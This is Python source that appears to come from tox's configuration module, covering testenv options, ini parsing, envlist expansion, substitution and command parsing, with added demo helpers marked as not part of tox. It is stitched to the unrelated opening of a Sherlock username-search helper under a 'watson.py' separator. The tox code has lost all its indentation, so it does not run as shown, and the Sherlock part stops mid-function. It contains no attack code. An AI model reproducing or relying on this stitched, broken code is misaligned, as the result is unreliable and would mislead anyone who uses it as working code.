def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="suicide_timeout",
type="float",
default=SUICIDE_TIMEOUT,
help="timeout to allow process to exit before sending SIGINT",
)
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = {}
"""Holds substitutions that could not be resolved.
Pre 2.8.1 missing substitutions crashed with a ConfigError although this would not be a
problem if the env is not part of the current testrun. So we need to remember this and
check later when the testenv is actually run and crash only then.
"""
# Python 3 only, as __getattribute__ is ignored for old-style types on Python 2
def __getattribute__(self, name):
rv = object.__getattribute__(self, name)
if isinstance(rv, Exception):
raise rv
return rv
if six.PY2:
def __getattr__(self, name):
if name in self._missing_subs:
raise self._missing_subs[name]
raise AttributeError(name)
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
is_bin = (
isinstance(self.python_info, NoInterpreterInfo)
or tox.INFO.IS_WIN is False
or self.python_info.implementation == "Jython"
or (
tox.INFO.IS_WIN
and self.python_info.implementation == "PyPy"
and self.python_info.extra_version_info < (7, 3, 1)
)
)
return self.envdir.join("bin" if is_bin else "Scripts")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts",
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err),
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class SkipThisIni(Exception):
"""Internal exception to indicate the parsed ini file should be skipped"""
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath() if ini_path.check(file=True) else ini_path
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
if ini_path.basename == "setup.cfg" and "tox:tox" not in self._cfg:
verbosity1("Found no [tox:tox] section in setup.cfg, skipping.")
raise SkipThisIni()
previous_line_of = self._cfg.lineof
self.expand_section_names(self._cfg)
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins",
self._cfg,
prefix=prefix,
fallbacksections=[fallbacksection],
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
reader.addsubstitutions(distshare=config.distshare)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(temp_dir=config.temp_dir)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
),
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
config.requires = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or Version(tox.__version__).public)
deps = self.ensure_requires_satisfied(config, config.requires, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name,
"{}{}".format(testenvprefix, name),
reader._subs,
config,
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
        # if provisioning is not on, now we need to do a strict argument evaluation
# raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name,
"{}{}".format(testenvprefix, name),
reader._subs,
config,
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
"argv_install_command",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name,
env_attr.default,
replace=replace,
no_fallback=no_fallback,
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs[env_attr.name] = res = e
# On Python 2, exceptions are handled in __getattr__
if not six.PY2 or not isinstance(res, Exception):
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
provision_tox_env = config.provision_tox_env
if config.provision_tox_env in env_list:
msg = "provision_tox_env {} cannot be part of envlist".format(provision_tox_env)
raise tox.exception.ConfigError(msg)
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
@staticmethod
def expand_section_names(config):
"""Generative section names.
Allow writing section as [testenv:py{36,37}-cov]
The parser will see it as two different sections: [testenv:py36-cov], [testenv:py37-cov]
"""
factor_re = re.compile(r"\{\s*([\w\s,-]+)\s*\}")
split_re = re.compile(r"\s*,\s*")
to_remove = set()
for section in list(config.sections):
split_section = factor_re.split(section)
for parts in itertools.product(*map(split_re.split, split_section)):
section_name = "".join(parts)
if section_name not in config.sections:
config.sections[section_name] = config.sections[section]
to_remove.add(section)
for section in to_remove:
del config.sections[section]
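# Hedged sketch (not part of tox): a stand-in object with a ``sections`` dict is
# enough to see expand_section_names split a generative name into concrete
# sections and drop the template section itself.
class _DemoIniSections:
    def __init__(self, sections):
        self.sections = sections
# cfg = _DemoIniSections({"testenv:py{36,37}-cov": {"deps": "coverage"}})
# ParseIni.expand_section_names(cfg)
# sorted(cfg.sections)  -> ["testenv:py36-cov", "testenv:py37-cov"]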
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = _ENVSTR_SPLIT_PATTERN.split(envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = _ENVSTR_EXPAND_PATTERN.split(env)
parts = [_WHITESPACE_PATTERN.sub("", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
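# Hedged examples (not part of tox, assuming the module-level envstr patterns
# defined earlier): braced factor groups multiply out in order, and _split_env
# strips comments and newlines before expanding. The asserts only run if this
# demo helper is called.
def _demo_envlist_expansion():
    assert _expand_envstr("py{37,38}-django{22,30}") == [
        "py37-django22", "py37-django30", "py38-django22", "py38-django30",
    ]
    assert _split_env("py37\npy38  # not run by default") == ["py37", "py38"]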
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
# Check value matches substitution form of referencing value from other section.
# E.g. {[base]commands}
class SectionReader:
def __init__(
self,
section_name,
cfgparser,
fallbacksections=None,
factors=(),
prefix=None,
posargs="",
):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
self.posargs = posargs
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
env_values = {}
for line in value.split(sep):
if line.strip():
if line.startswith("#"): # comment lines are ignored
pass
elif line.startswith("file|"): # file markers contain paths to env files
file_path = line[5:].strip()
if os.path.exists(file_path):
with open(file_path, "rt") as file_handler:
content = file_handler.read()
env_values.update(self._getdict(content, "", sep, replace))
else:
name, value = line.split("=", 1)
env_values[name.strip()] = value.strip()
return env_values
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s),
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace, name=name)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getargv_install_command(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
if not s:
            # This occurs when factors are used, and a testenv doesn't have
            # a factorised value for install_command, most commonly when the
            # platform setting is also used.
            # An empty value would trigger the "install_command must contain
            # '{packages}'" error, so fall back to the default.
s = default
if "{packages}" in s:
s = s.replace("{packages}", r"\{packages\}")
if "{opts}" in s:
s = s.replace("{opts}", r"\{opts\}")
return _ArgvlistReader.getargvlist(self, s, replace=replace, name=name)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
# It is needed to apply factors before unwrapping
# dependencies, otherwise it can break the substitution
# process. Once they are unwrapped, we call apply factors
# again for those new dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def getposargs(self, default=None):
if self.posargs:
posargs = self.posargs
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
return posargs_string
else:
return default or ""
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = _FACTOR_LINE_PATTERN.search(line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
assert name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name),
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>([^{}]|\\{|\\})*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
@staticmethod
def _unescape(s):
return s.replace("\\{", "{").replace("\\}", "}")
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
full_match = match.group(0)
# ":" is swallowed by the regex, so the raw matched string is checked
if full_match.startswith("{:"):
if full_match != "{:}":
raise tox.exception.ConfigError(
"Malformed substitution with prefix ':': {}".format(full_match),
)
return os.pathsep
default_value = g["default_value"]
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
if sub_value == "posargs":
return self.reader.getposargs(default_value)
sub_type = g["sub_type"]
if sub_type == "posargs":
if default_value:
value = "{}:{}".format(sub_value, default_value)
else:
value = sub_value
return self.reader.getposargs(value)
if not sub_type and not sub_value:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided. "
"If you were using `{}` for `os.pathsep`, please use `{:}`.",
)
if not sub_type and not default_value and sub_value == "/":
return os.sep
if sub_type == "env":
return self._replace_env(sub_value, default_value)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type == "posargs":
return self.reader.getposargs(sub_value)
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type),
)
return self._replace_substitution(sub_value)
def _replace_env(self, key, default):
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise tox.exception.SubstitutionStackError(
"{} already in {}".format((section, item), self.reader._subststack),
)
x = str(cfg[section][item])
return self.reader._replace(
x,
name=item,
section_name=section,
crossonly=self.crossonly,
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, sub_key):
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
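# Hedged illustration (not part of tox): what RE_ITEM_REF extracts from common
# ini substitution expressions; the group names match the pattern defined above.
def _demo_item_ref(expr):
    match = Replacer.RE_ITEM_REF.search(expr)
    return None if match is None else match.groupdict()
# _demo_item_ref("{env:HOME:/tmp}")
#   -> sub_type 'env', substitution_value 'HOME', default_value '/tmp'
# _demo_item_ref("{posargs}")
#   -> sub_type None, substitution_value 'posargs', default_value None
# _demo_item_ref("{[base]deps}")
#   -> sub_type None, substitution_value '[base]deps', default_value None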
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True, name=None):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True, name=name)
commands.extend(cls.getargvlist(reader, replaced, name=name))
else:
commands.append(cls.processcommand(reader, current_command, replace, name=name))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name,
"commands",
),
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True, name=None):
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
if word == "[]":
newcommand += reader.getposargs()
continue
new_arg = ""
new_word = reader._replace(word, name=name)
new_word = reader._replace(new_word, name=name)
new_word = Replacer._unescape(new_word)
new_arg += new_word
newcommand += new_arg
else:
newcommand = command
# Construct shlex object that will not escape any values,
# use all values as is in argv.
shlexer = shlex.shlex(newcommand, posix=True)
shlexer.whitespace_split = True
shlexer.escape = ""
return list(shlexer)
class CommandParser(object):
class State(object):
def __init__(self):
self.word = ""
self.depth = 0
self.yield_words = []
def __init__(self, command):
self.command = command
def words(self):
ps = CommandParser.State()
def word_has_ended():
return (
(
cur_char in string.whitespace
and ps.word
and ps.word[-1] not in string.whitespace
)
or (cur_char == "{" and ps.depth == 0 and not ps.word.endswith("\\"))
or (ps.depth == 0 and ps.word and ps.word[-1] == "}")
or (cur_char not in string.whitespace and ps.word and ps.word.strip() == "")
)
def yield_this_word():
yieldword = ps.word
ps.word = ""
if yieldword:
ps.yield_words.append(yieldword)
def yield_if_word_ended():
if word_has_ended():
yield_this_word()
def accumulate():
ps.word += cur_char
def push_substitution():
ps.depth += 1
def pop_substitution():
ps.depth -= 1
for cur_char in self.command:
if cur_char in string.whitespace:
if ps.depth == 0:
yield_if_word_ended()
accumulate()
elif cur_char == "{":
yield_if_word_ended()
accumulate()
push_substitution()
elif cur_char == "}":
accumulate()
pop_substitution()
else:
yield_if_word_ended()
accumulate()
if ps.word.strip():
yield_this_word()
return ps.yield_words
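# Hedged sketch (not part of tox): CommandParser keeps substitution expressions
# together as single words and yields whitespace runs as separate tokens, so
# processcommand() above can replace each piece independently. The assert only
# runs if this demo helper is called.
def _demo_command_parser():
    assert CommandParser("pytest {posargs} tests").words() == [
        "pytest", " ", "{posargs}", " ", "tests",
    ]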
def getcontextname():
if any(env in os.environ for env in ["JENKINS_URL", "HUDSON_URL"]):
return "jenkins"
return None
|
watson.py
|
#! /usr/bin/env python3
"""
Sherlock: Find Usernames Across Social Networks Module
This module contains helper methods for Sherlock.
"""
# ==================== Imports ==================== #
import requests
import itertools
import threading
import time
import sys
from colorama import Fore, Style
from requests_futures.sessions import FuturesSession
# ==================== Main ==================== #
class ElapsedFuturesSession(FuturesSession):
"""
    Extends FuturesSession to add a response-time metric to each request.
This is taken (almost) directly from here: https://github.com/ross/requests-futures#working-in-the-background
"""
    def request(self, method, url, hooks=None, *args, **kwargs):
        # Avoid a shared mutable default: a module-level {} would accumulate
        # timing hooks across calls.
        if hooks is None:
            hooks = {}
        start = time.time()
def timing(r, *args, **kwargs):
elapsed_sec = time.time() - start
r.elapsed = round(elapsed_sec * 1000)
